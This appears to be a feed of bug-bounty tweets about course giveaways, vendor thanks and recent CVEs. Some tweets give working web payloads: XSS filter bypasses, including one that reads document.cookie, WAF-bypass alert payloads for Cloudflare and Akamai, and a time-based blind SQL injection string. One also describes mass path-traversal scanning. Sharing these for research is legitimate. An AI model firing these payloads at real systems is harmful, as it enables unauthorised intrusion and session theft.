🎯 Black Friday Special+ Giveaway: Get the full course for just $29 (reg. $119) at with code 'FRIDAY2024'! hhub.io/BlackFriday Includes: 15+ Hours of content + 100+ labs! 🎁 BONUS: reply & retweet - one lucky winner gets 2 FREE course coupons (keep one, gift one)!

🎁 End of Year Giveaway 🎁 Hack The Box 6-month VIP+ x1 - Follow, Like, and Retweet to join! - Winner will be picked randomly on December. #hackthebox #giveaway #projectsekaictf

🛑 GIVEAWAY ALERT 🛑 Today is DAY TWO of FIVE DAYS of Arcanum Information Security and friends Black Friday and Cyber Monday giveaways! Today we are giving away FIVE seats to our flagship training: "The Bug Hunter's Methodology Live" TBHM is one of the BEST trainings in the industry for

Update no 7: Reported 50 submissions (total). 1. XSS Bypass: <form><math><mtext></form><form><mglyph><style></math><img src onerror=alert(document.cookie)><style>:target {color:red;}</style> 2. Another XSS Bypass: =>

Final giveaway of the year🎁: 4️⃣Hand-On Web Exploitation (Course Only hhub.io/2024holidays) 3️⃣Shodan Codes 2️⃣Caido licenses 1️⃣Hands-On Web Exploitation (Certificate+Course Bundle) To enter drop a 🫶🏼and RT

Bypass Cloudflare WAF (DOM-based XSS) ♻️ Payload: '-alert?.(1)-' writeup: 1337.or.id/post/stored-do… #infosec #cybersec #bugbountytips

Proud to be recognized by NASA for my security research contributions! It's an honor to help safeguard critical systems and support the mission of space exploration. Grateful for this acknowledgment! 🚀🔒 #NASA #CyberSecurity #BugBounty #Bugcrowd #EthicalHacking

Just received swag from Sony via HackerOne for a valid vulnerability report! Another step forward in my #BugBounty journey. Stay consistent, stay curious! #InfoSec #BugBountyHunter #CyberSecurity #HackerOne #ResponsibleDisclosure #EthicalHacking #RedTeam #AppSec #BugBountyWin

Simple LFI using my path traversal script on GitHub. Used Devansh (⚡, 🥷)’s ParamSpider to gather URLs, filtered for relevant parameters, slightly modified the script to inject payloads into parameters like ?path and ?file, & ran the script — got 1 hit out of 20k+ URLs. The target is

Cloudflare 403 bypass to time-based blind SQLi: PL: (select(0)from(select(sleep(10)))v) → 403 but PL: (select(0)from(select(sleep(6)))v)/*'%2B(select(0)from(select(sleep(6)))v)%2B'%5C"%2B(select(0)from(select(sleep(6)))v) → Time-based Blind SQLi #BugBounty #SQLi

AWS pen-test Methodologies #BugBounty #bugbountytips #pentest #Pentesting #EthicalHacking #recon #CyberSecurity #aws

CVE-2025-4123 : A Cross-Site Scripting (XSS) Vulnerability Exists in Grafana Github Code: github.com/NightBloodz/CV… #infosec #hacking #Hacker #cybersecurity #bugbounty #bugbountytips #xss

3 Akamai WAF Bypass 'a'.replace.call`1${/./}${alert}` 'a,'.replace`a${alert}` 'a'.replace(/./,alert) #akamai #bugbounty #bughunting #infosec #security #ethicalhacking

CVE-2025-55315 - ASP.NET Kestrel HTTP Request and Response Smuggling Another automated reproduction from #pruva - this time plus a bonus point: A Detection! gist.github.com/N3mes1s/d0897c… Thanks turb0 #BugBounty #EthicalHacking #CyberSecurity

🚨 CVE-2025-55315 (CVSS 9.9) – Critical HTTP Request Smuggling in ASP. NET Kestrel Our Cyber Security Engineer Amit Kumar🇮🇳 discovered & added a severe chunked encoding bypass leading to smuggling to ProjectDiscovery zurl.co/PHSTP #infosec #bugbountytips #bugbounty